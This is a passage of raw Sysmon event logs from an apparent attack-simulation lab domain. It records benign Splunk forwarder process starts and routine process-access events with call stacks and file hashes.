10341000x800000000000000032664Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.835{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-36CA-6013-6503-00000000A401}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032663Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.835{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-36CA-6013-6503-00000000A401}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032662Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.836{FF16AF91-36CA-6013-6503-00000000A401}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000032661Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.304{FF16AF91-36CA-6013-6403-00000000A401}27485824C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032660Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.163{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-36CA-6013-6403-00000000A401}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032659Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.163{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032658Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.163{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032657Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.163{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032656Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.163{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032655Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.163{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-36CA-6013-6403-00000000A401}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032654Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.163{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-36CA-6013-6403-00000000A401}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032653Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.164{FF16AF91-36CA-6013-6403-00000000A401}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000032678Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.507{FF16AF91-36CD-6013-6603-00000000A401}8367004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032677Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.366{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-36CD-6013-6603-00000000A401}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032676Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.366{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032675Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.366{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032674Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.366{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032673Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.366{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032672Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.366{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-36CD-6013-6603-00000000A401}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032671Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.366{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-36CD-6013-6603-00000000A401}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032670Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.367{FF16AF91-36CD-6013-6603-00000000A401}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000359970Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.957{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-36ce-6013-9303-000000001100}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359969Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.957{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359968Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.957{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359967Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.957{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359966Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.957{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359965Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.957{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-36ce-6013-9303-000000001100}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000359964Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.957{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-36ce-6013-9303-000000001100}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000359963Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.958{8e433fbf-36ce-6013-9303-000000001100}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 